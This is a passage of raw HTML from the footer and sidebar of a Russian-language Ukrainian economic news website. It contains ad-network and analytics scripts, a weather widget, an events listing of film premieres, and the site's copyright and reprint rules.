src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"><img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td></tr> </table></div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"><script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/category/3/ " target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div> <div id="M469261ScriptRootC781152"> <div id="M469261PreloadC781152"> Loading... </div> </div> <script> (function () { var script = document.createElement('script'); script.src = "//jsc.idealmedia.io/e/n/enovosty.com.781152.js?t=" + ((d = new Date()) ? '' + d.getUTCFullYear() + d.getUTCMonth() + d.getUTCDate() + d.getUTCHours() : ''); script.async = true; document.body.appendChild(script); })(); </script> <br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script><div id="lastafisha" class="slide" style="width:240px;margin:auto;"><script>jQuery(document).ready(function($){function region(){html = $('#lastafisha .anythingWindow .activePage .region').html();$('#lastafisha .head span').html(html);}$('#sliderafisha').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><p style="margin: 0;
font-size: 13pt;
font-weight: 700;
font-family: arial,verdana,tahoma;
text-align: left;
padding: 10px 32px 10px 35px;" class="head">Афиша<span style="float: right; font-size: 11px; line-height: 18px;">&nbsp;</span></p><ul id="sliderafisha"><li><ul class="tact"><li ><div id="post-4797909" class="postafisha"><span class="region">Киев 26&#160;марта</span><div class="aimg"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-veryu-v-lyubov"><img width="170" height="132" alt="Кинопремьера: фильм «Верю в любовь»" src="/wp-content/uploads/2020/03/viru_v.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-veryu-v-lyubov">Кинопремьера: фильм «Верю в любовь»</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4797920" class="postafisha"><span class="region">Киев 26&#160;марта</span><div class="aimg"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-v-chornij-chornij-kimnati"><img width="170" height="132" alt="Кинопремьера: фильм «В Чорній, Чорній ..." src="/wp-content/uploads/2020/03/komnata.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-v-chornij-chornij-kimnati">Кинопремьера: фильм «В Чорній, Чорній ...</a></div></div></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div> </br></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a><br><script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4798428"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4798428","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "a1bca02a28";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script><div id="adfox_158341471001027392"></div><script>window.Ya.adfoxCode.create({ownerId: 321599,containerId: 'adfox_158341471001027392',params: {pp: 'i',ps: 'dtsy',p2: 'gqgo'
}});</script></body></html>